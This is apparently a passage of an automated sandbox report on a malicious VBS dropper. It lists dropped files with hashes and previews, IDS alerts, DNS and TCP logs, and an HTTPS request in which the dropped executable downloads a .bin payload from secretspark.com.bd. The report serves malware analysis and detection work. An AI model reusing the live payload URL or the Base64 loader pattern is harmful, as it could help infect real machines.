                              Preview:..............@.................................e.................r...................P...................n..........h..............................H.................................:.................O......'......................:...............................j.......................................................................=..................M...................Z............................0................................R.......................................................u.......}........................T............................................................,........................S...........t3.......N..............k.........................m...J..........................................l.......................h.........g8..........................................u..............................................................H...........................=.......................................=.............].................y].....................................

                              C:\Users\user\AppData\Local\Temp\identitetsproblemer\Mercerising\aftalekalendere.ave

                              Download File
                              Process:C:\Users\user\AppData\Local\Temp\temp_executable.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):271412
                              Entropy (8bit):1.2583214297628365
                              Encrypted:false
                              SSDEEP:768:ss00Zex8KPD3fpe9j0LVj5L9Vxok4D6BHZRMfam5N6dYaR+jWeaybNw1J3h91qpV:LajLVfVCWiNP8oyZe3r
                              MD5:0011B4FCEA11597D004FEBE62052FC53
                              SHA1:69934B76F8F98A59E8F198E361586FAAA5BA51BC
                              SHA-256:4F69039FD8F163A715A6A5C2216308A008BBB9685B62F7896E36553F7DAFF7C2
                              SHA-512:347B5123DACB39683D1BC4CB39F3F556C2110AB712A627BEAB8529C2A80BDD35C303921BABB433682978DA4FDE6A83C88F2FD96668DAA41EC1C7DD6AA4AAFACB
                              Malicious:false
                              Preview:.................................w.8.................................................l.....r..........g...............................................^............K........N...........................................i...#.......................}...........................................`...........................................................q.................................................................M.................................J............................................................................................................................2..............................._................>...c.B......................................................................'.........................".......................................................&.........I..................................................................................................................................,.........H.......................................{...@.......................

                              C:\Users\user\AppData\Local\Temp\identitetsproblemer\Mercerising\energiraads.ref

                              Download File
                              Process:C:\Users\user\AppData\Local\Temp\temp_executable.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):257617
                              Entropy (8bit):1.246099982169644
                              Encrypted:false
                              SSDEEP:768:i0+x7CVav80s+kp4+TGeBEOLQviryD5YJ+i6LOmdmpBnVd5rl2ikTRlQlDZDCJN0:HHgo2O3/JQOBPiHdtO9T9t
                              MD5:35283846FDE3D302BF4504D08C68E427
                              SHA1:1889C48CBDCEBC6B10EC791494720AB420409897
                              SHA-256:FFA02D9E8099ED157EC815E544926014C529B9F51EE1788B8FD9968B3D799049
                              SHA-512:3C948EC1B4A530ADAB90E0AAF23C96DA49FC17FBCC3FF0B2DD9505C52CBFFDE3502CEAAD91E0D6534F6AFD332557CD90F5D60BD8C81560A4CBAF387B9B501C18
                              Malicious:false
                              Preview:...........p....:......[........P.........................z.................+...............$..F..........................................#..............................................................................................................N.....................`...............................................N................................z..........k.-............................................................................q.p%.........nt..................;...........{...........................................................+.......................q......W......................}...........A.................g..............D......z..;..........................1.......................................................h.......r..............................................I.............................F...............F............&........................X.........................................<.............}............Z..T................................9.........%......

                              C:\Users\user\AppData\Local\Temp\nsfA9D2.tmp\System.dll

                              Download File
                              Process:C:\Users\user\AppData\Local\Temp\temp_executable.exe
                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):12288
                              Entropy (8bit):5.97694153396788
                              Encrypted:false
                              SSDEEP:192:acA1YOTDExj7EFrYCT4E8y3hoSdtTgwF43E7QbGPXI9uIc6w79Mw:RR7SrtTv53tdtTgwF4SQbGPX36wJMw
                              MD5:D6F54D2CEFDF58836805796F55BFC846
                              SHA1:B980ADDC1A755B968DD5799179D3B4F1C2DE9D2D
                              SHA-256:F917AEF484D1FBB4D723B2E2D3045CB6F5F664E61FBB3D5C577BD1C215DE55D9
                              SHA-512:CE67DA936A93D46EF7E81ABC8276787C82FD844C03630BA18AFC3528C7E420C3228BFE82AEDA083BB719F2D1314AFAE913362ABD1E220CB364606519690D45DB
                              Malicious:false
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Joe Sandbox View:
                              • Filename: mbdcKkZ3Ag.exe, Detection: malicious, Browse
                              • Filename: mbdcKkZ3Ag.exe, Detection: malicious, Browse
                              • Filename: mydreamudpate.hta, Detection: malicious, Browse
                              • Filename: Thermo Fisher RFQ_TFS-1507.xls, Detection: malicious, Browse
                              • Filename: BCXV7eBAlV.exe, Detection: malicious, Browse
                              • Filename: W9RpT8yapE.hta, Detection: malicious, Browse
                              • Filename: BCXV7eBAlV.exe, Detection: malicious, Browse
                              • Filename: AWB 9869692024 Clearance Doc.exe, Detection: malicious, Browse
                              • Filename: AWB 9869692024 Clearance Doc.exe, Detection: malicious, Browse
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........@t.]!..]!..]!...T..Z!...Y..Z!..]!..I!...T..Y!...T..\!...T..\!...T..\!..Rich]!..................PE..L.....*c.........."!.....$..........J........@...............................p............@..........................@.......A..P............................`.......................................................@..X............................text...{".......$.................. ..`.rdata.......@.......(..............@..@.data...D....P.......,..............@....reloc.......`......................@..B................................................................................................................................................................................................................................................................................................................................................................................

                              C:\Users\user\AppData\Local\Temp\temp_executable.exe

                              Download File
                              Process:C:\Windows\System32\wscript.exe
                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                              Category:dropped
                              Size (bytes):830512
                              Entropy (8bit):7.741676173417688
                              Encrypted:false
                              SSDEEP:12288:2RfuTA5o9DiPijqt3zyBfYCZgCgkRWQsv4L64Ay7wltm4pMTiCltKYE/oVVqD3EG:AfuTVCt3zyeOfswGpm4OfeoVVqD3EG
                              MD5:C9B895E1253AA2B7147BE9B1E43F2DBD
                              SHA1:9EF2D92E0917B65DEE0A3D45872BE70992AC0882
                              SHA-256:C087B6B42EA2FA23894C1E4928D7EB6D312F4769635BFB9B22EF23A09444FA0D
                              SHA-512:B3493B7C9BA0E88319BF2A413C53873AB5CC8D9D1B7155FAE907D41FACD2A959FED68F5A84AE044406CC3F7143D9294C16274CE7E182B723CC55CDAE91399601
                              Malicious:true
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 8%
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......7..!smersmersmer8.asqmer8.csrmer8.ds|mersmdr.mer..asxmer...rrmer..gsrmerRichsmer........PE..L...?.*c.................n...*.......6............@.......................................@..........................................P...L..........X................................................................................................text...wl.......n.................. ..`.rdata...............r..............@..@.data...............................@....ndata...................................rsrc....L...P...N..................@..@................................................................................................................................................................................................................................................................................................................................................

                              Static File Info

                              General

                              File type:ASCII text, with very long lines (65399), with CRLF line terminators
                              Entropy (8bit):5.698921339858924
                              TrID:
                              • Visual Basic Script (13500/0) 100.00%
                              File name:Zeskanowana lista przedmiot#U00f3w nr 84329.vbs
                              File size:1'306'825 bytes
                              MD5:66ccc86e92b90555bef9ec7f4281cc8b
                              SHA1:8ef7f0bec3beb48df154b350cae7729df9e3cb74
                              SHA256:6e435f3a080733d5733beb10fd0d45f8530f9f5ebf8367ff1b4daf56d0106dc3
                              SHA512:89d225f726add2f44a33a8dd85ceb89a2fd6e526586e079ad62247659766337367888376f0d44b1eb936103ca0d499a59c6fb11a3aeb9fe3e60e7c72ed218b2e
                              SSDEEP:24576:aYQfEcXSFMuTGp2jdvB8S+QrShBYxfcFme3Frt0yOL09jFxzUA8cP51Xq:AccYMx7h6kuQq
                              TLSH:A055E198CF276E58A41711BC8A0B2B466CFC8DBC8269EFE8E55C345859D0E79133B3D4
                              File Content Preview:' Main script logic for processing Base64-encoded data....' Initialize the Base64 encoded string (placeholder)..Dim encodedBase64String..encodedBase64String = "));;;qQ@@@@M@@@@@@@@E@@@@@@@@//8@@@@Lg@@@@@@@@@@@@@@@@@@Q@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@

                              File Icon

                              Icon Hash:68d69b8f86ab9a86

                              Network Behavior

                              Suricata IDS Alerts

                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                              2024-09-25T17:20:28.125456+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.11.2049755170.249.236.53443TCP

                              Network Port Distribution

                              TCP Packets

                              TimestampSource PortDest PortSource IPDest IP
                              Sep 25, 2024 17:20:27.554327011 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:27.554461002 CEST44349755170.249.236.53192.168.11.20
                              Sep 25, 2024 17:20:27.554644108 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:27.591285944 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:27.591363907 CEST44349755170.249.236.53192.168.11.20
                              Sep 25, 2024 17:20:27.872036934 CEST44349755170.249.236.53192.168.11.20
                              Sep 25, 2024 17:20:27.872275114 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:27.907449007 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:27.907536030 CEST44349755170.249.236.53192.168.11.20
                              Sep 25, 2024 17:20:27.908664942 CEST44349755170.249.236.53192.168.11.20
                              Sep 25, 2024 17:20:27.908906937 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:27.911031008 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:27.952291012 CEST44349755170.249.236.53192.168.11.20
                              Sep 25, 2024 17:20:28.125596046 CEST44349755170.249.236.53192.168.11.20
                              Sep 25, 2024 17:20:28.125972033 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.126032114 CEST44349755170.249.236.53192.168.11.20
                              Sep 25, 2024 17:20:28.126302958 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.245718002 CEST44349755170.249.236.53192.168.11.20
                              Sep 25, 2024 17:20:28.245727062 CEST44349755170.249.236.53192.168.11.20
                              Sep 25, 2024 17:20:28.245795965 CEST44349755170.249.236.53192.168.11.20
                              Sep 25, 2024 17:20:28.245906115 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.245906115 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.245933056 CEST44349755170.249.236.53192.168.11.20
                              Sep 25, 2024 17:20:28.245950937 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.245950937 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.245999098 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.246033907 CEST44349755170.249.236.53192.168.11.20
                              Sep 25, 2024 17:20:28.246085882 CEST44349755170.249.236.53192.168.11.20
                              Sep 25, 2024 17:20:28.246097088 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.246114969 CEST44349755170.249.236.53192.168.11.20
                              Sep 25, 2024 17:20:28.246201992 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.246201992 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.246279001 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.246279001 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.246345997 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.366190910 CEST44349755170.249.236.53192.168.11.20
                              Sep 25, 2024 17:20:28.366209030 CEST44349755170.249.236.53192.168.11.20
                              Sep 25, 2024 17:20:28.366338968 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.366338968 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.366391897 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.366431952 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.366431952 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.366447926 CEST44349755170.249.236.53192.168.11.20
                              Sep 25, 2024 17:20:28.366481066 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.366555929 CEST44349755170.249.236.53192.168.11.20
                              Sep 25, 2024 17:20:28.366576910 CEST44349755170.249.236.53192.168.11.20
                              Sep 25, 2024 17:20:28.366581917 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.366595984 CEST44349755170.249.236.53192.168.11.20
                              Sep 25, 2024 17:20:28.366684914 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.366684914 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.366734028 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.366734028 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.366734028 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.366734028 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.366781950 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.366781950 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.366831064 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.366831064 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.367007971 CEST44349755170.249.236.53192.168.11.20
                              Sep 25, 2024 17:20:28.367023945 CEST44349755170.249.236.53192.168.11.20
                              Sep 25, 2024 17:20:28.367153883 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.367153883 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.367202044 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.367202044 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.367300034 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.367300034 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.367314100 CEST44349755170.249.236.53192.168.11.20
                              Sep 25, 2024 17:20:28.367451906 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.486103058 CEST44349755170.249.236.53192.168.11.20
                              Sep 25, 2024 17:20:28.486145020 CEST44349755170.249.236.53192.168.11.20
                              Sep 25, 2024 17:20:28.486308098 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.486308098 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.486334085 CEST44349755170.249.236.53192.168.11.20
                              Sep 25, 2024 17:20:28.486347914 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.486423969 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.486423969 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.486495018 CEST44349755170.249.236.53192.168.11.20
                              Sep 25, 2024 17:20:28.486516953 CEST44349755170.249.236.53192.168.11.20
                              Sep 25, 2024 17:20:28.486529112 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.486557961 CEST44349755170.249.236.53192.168.11.20
                              Sep 25, 2024 17:20:28.486681938 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.486682892 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.486753941 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.486753941 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.486753941 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.486802101 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.487013102 CEST44349755170.249.236.53192.168.11.20
                              Sep 25, 2024 17:20:28.487035036 CEST44349755170.249.236.53192.168.11.20
                              Sep 25, 2024 17:20:28.487195969 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.487313032 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.487323999 CEST44349755170.249.236.53192.168.11.20
                              Sep 25, 2024 17:20:28.487468958 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.487694979 CEST44349755170.249.236.53192.168.11.20
                              Sep 25, 2024 17:20:28.487864971 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.487888098 CEST44349755170.249.236.53192.168.11.20
                              Sep 25, 2024 17:20:28.487947941 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.487968922 CEST44349755170.249.236.53192.168.11.20
                              Sep 25, 2024 17:20:28.488017082 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.488017082 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.488065004 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.488065004 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.488065004 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.488106012 CEST44349755170.249.236.53192.168.11.20
                              Sep 25, 2024 17:20:28.488291025 CEST44349755170.249.236.53192.168.11.20
                              Sep 25, 2024 17:20:28.488293886 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.488293886 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.488322020 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.488322020 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.488337040 CEST44349755170.249.236.53192.168.11.20
                              Sep 25, 2024 17:20:28.488419056 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.488419056 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.488466978 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.488497972 CEST44349755170.249.236.53192.168.11.20
                              Sep 25, 2024 17:20:28.488514900 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.488564968 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.488571882 CEST44349755170.249.236.53192.168.11.20
                              Sep 25, 2024 17:20:28.488663912 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.488663912 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.488663912 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.488760948 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.488821983 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.608977079 CEST44349755170.249.236.53192.168.11.20
                              Sep 25, 2024 17:20:28.609051943 CEST44349755170.249.236.53192.168.11.20
                              Sep 25, 2024 17:20:28.609216928 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.609216928 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.609265089 CEST44349755170.249.236.53192.168.11.20
                              Sep 25, 2024 17:20:28.609286070 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.609286070 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.609286070 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.609525919 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.609769106 CEST44349755170.249.236.53192.168.11.20
                              Sep 25, 2024 17:20:28.609827042 CEST44349755170.249.236.53192.168.11.20
                              Sep 25, 2024 17:20:28.609998941 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.609998941 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.610035896 CEST44349755170.249.236.53192.168.11.20
                              Sep 25, 2024 17:20:28.610055923 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.610138893 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.610193968 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.610435963 CEST44349755170.249.236.53192.168.11.20
                              Sep 25, 2024 17:20:28.610488892 CEST44349755170.249.236.53192.168.11.20
                              Sep 25, 2024 17:20:28.610661030 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.610661983 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.610685110 CEST44349755170.249.236.53192.168.11.20
                              Sep 25, 2024 17:20:28.610765934 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.610862017 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.611215115 CEST44349755170.249.236.53192.168.11.20
                              Sep 25, 2024 17:20:28.611258030 CEST44349755170.249.236.53192.168.11.20
                              Sep 25, 2024 17:20:28.611403942 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.611403942 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.611490011 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.611490011 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.611521959 CEST44349755170.249.236.53192.168.11.20
                              Sep 25, 2024 17:20:28.611545086 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.611686945 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.611845016 CEST44349755170.249.236.53192.168.11.20
                              Sep 25, 2024 17:20:28.611891031 CEST44349755170.249.236.53192.168.11.20
                              Sep 25, 2024 17:20:28.612009048 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.612009048 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.612047911 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.612065077 CEST44349755170.249.236.53192.168.11.20
                              Sep 25, 2024 17:20:28.612097025 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.612097025 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.612219095 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.612237930 CEST44349755170.249.236.53192.168.11.20
                              Sep 25, 2024 17:20:28.612255096 CEST44349755170.249.236.53192.168.11.20
                              Sep 25, 2024 17:20:28.612319946 CEST44349755170.249.236.53192.168.11.20
                              Sep 25, 2024 17:20:28.612431049 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.612431049 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.612451077 CEST44349755170.249.236.53192.168.11.20
                              Sep 25, 2024 17:20:28.612481117 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.612482071 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.612576008 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.612624884 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.612684011 CEST44349755170.249.236.53192.168.11.20
                              Sep 25, 2024 17:20:28.612730026 CEST44349755170.249.236.53192.168.11.20
                              Sep 25, 2024 17:20:28.612818956 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.612818956 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.612868071 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.612868071 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.612868071 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.612868071 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.612893105 CEST44349755170.249.236.53192.168.11.20
                              Sep 25, 2024 17:20:28.612919092 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.612920046 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.612920046 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.612920046 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.612966061 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.613064051 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.613068104 CEST44349755170.249.236.53192.168.11.20
                              Sep 25, 2024 17:20:28.613090038 CEST44349755170.249.236.53192.168.11.20
                              Sep 25, 2024 17:20:28.613195896 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.613195896 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.613215923 CEST44349755170.249.236.53192.168.11.20
                              Sep 25, 2024 17:20:28.613244057 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.613244057 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.613295078 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.613295078 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.613326073 CEST44349755170.249.236.53192.168.11.20
                              Sep 25, 2024 17:20:28.613343954 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.613343954 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.613343954 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.613399982 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.613413095 CEST44349755170.249.236.53192.168.11.20
                              Sep 25, 2024 17:20:28.613440990 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.613461018 CEST44349755170.249.236.53192.168.11.20
                              Sep 25, 2024 17:20:28.613538980 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.613567114 CEST44349755170.249.236.53192.168.11.20
                              Sep 25, 2024 17:20:28.613600016 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.613600969 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.613651037 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.613651991 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.613651991 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.613651991 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.613742113 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.613802910 CEST44349755170.249.236.53192.168.11.20
                              Sep 25, 2024 17:20:28.613938093 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.613938093 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.613974094 CEST44349755170.249.236.53192.168.11.20
                              Sep 25, 2024 17:20:28.613986015 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.614034891 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.614034891 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.614131927 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.614180088 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.614202976 CEST44349755170.249.236.53192.168.11.20

                              UDP Packets

                              TimestampSource PortDest PortSource IPDest IP
                              Sep 25, 2024 17:20:26.996191978 CEST6509853192.168.11.201.1.1.1
                              Sep 25, 2024 17:20:27.549354076 CEST53650981.1.1.1192.168.11.20

                              DNS Queries

                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                              Sep 25, 2024 17:20:26.996191978 CEST192.168.11.201.1.1.10xc3eaStandard query (0)secretspark.com.bdA (IP address)IN (0x0001)false

                              DNS Answers

                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                              Sep 25, 2024 17:20:27.549354076 CEST1.1.1.1192.168.11.200xc3eaNo error (0)secretspark.com.bd170.249.236.53A (IP address)IN (0x0001)false

                              HTTP Request Dependency Graph

                              • secretspark.com.bd

                              HTTPS Proxied Packets

                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              0192.168.11.2049755170.249.236.534434004C:\Users\user\AppData\Local\Temp\temp_executable.exe
                              TimestampBytes transferredDirectionData
                              2024-09-25 15:20:27 UTC187OUTGET /TkFvuYGGiJLZuopqvpi7.bin HTTP/1.1
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                              Host: secretspark.com.bd
                              Cache-Control: no-cache
                              2024-09-25 15:20:28 UTC404INHTTP/1.1 200 OK
                              Connection: close
                              content-type: application/octet-stream
                              last-modified: Wed, 25 Sep 2024 05:20:55 GMT
                              accept-ranges: bytes
                              content-length: 336448
                              date: Wed, 25 Sep 2024 15:20:28 GMT
                              server: LiteSpeed
                              alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
